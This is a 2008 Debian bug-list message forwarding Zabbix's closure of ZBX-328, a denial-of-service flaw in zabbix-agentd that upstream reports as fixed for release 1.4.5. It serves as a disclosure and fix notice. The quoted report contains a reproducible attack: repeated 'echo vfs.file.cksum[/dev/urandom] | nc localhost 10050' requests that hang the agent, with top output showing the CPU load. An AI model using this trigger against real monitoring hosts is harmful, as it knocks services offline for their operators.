Bug#471678: [support@zabbix.com: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd]

Tue, 25 Mar 2008 08:00:42 -0700 

hi,

see upstreams response.

----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL 
PROTECTED]> -----

From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: [EMAIL PROTECTED]
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd


     [ 
https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexei Vladishev closed ZBX-328.
--------------------------------

    Resolution: Fixed

The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be 
released this week.

Alexei

> Possible DoS against zabbix-agentd
> ----------------------------------
>
>                 Key: ZBX-328
>                 URL: https://support.zabbix.com/browse/ZBX-328
>             Project: ZABBIX
>          Issue Type: Bug
>          Components: Agent (Unix)
>         Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 
> 2.80GHz
>            Reporter: Milen Rangelov
>            Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU 
> resources.
> This can be triggered by sending the agent a file checksum request 
> (vfs.file.cksum[file]) with file argument being some "special" device file 
> like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then 
> the zabbix_agentd service will not be able to serve any requests until it's 
> restarted.
> Here's some example session :
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 
> &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 
> &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 
> &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 
> &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total,   5 running, 178 sleeping,   0 stopped,   0 zombie 
> Cpu(s):  2.0%us, 97.0%sy,  1.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
> <snip>
>     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 24381 zabbix    30   5  5056 1032  768 R   65  0.1   4:16.01 zabbix_agentd
> 24382 zabbix    30   5  5068 1044  776 R   50  0.1   4:12.18 zabbix_agentd
> 24380 zabbix    30   5  5068 1044  776 R   50  0.1   4:01.24 zabbix_agentd
> 24379 zabbix    30   5  5056 1036  772 R   31  0.1   4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so 
> hard to spoof it if he's on the same ethernet segment as the host running the 
> zabbix_agent.

-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: 
https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

        

----- End forwarded message -----



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to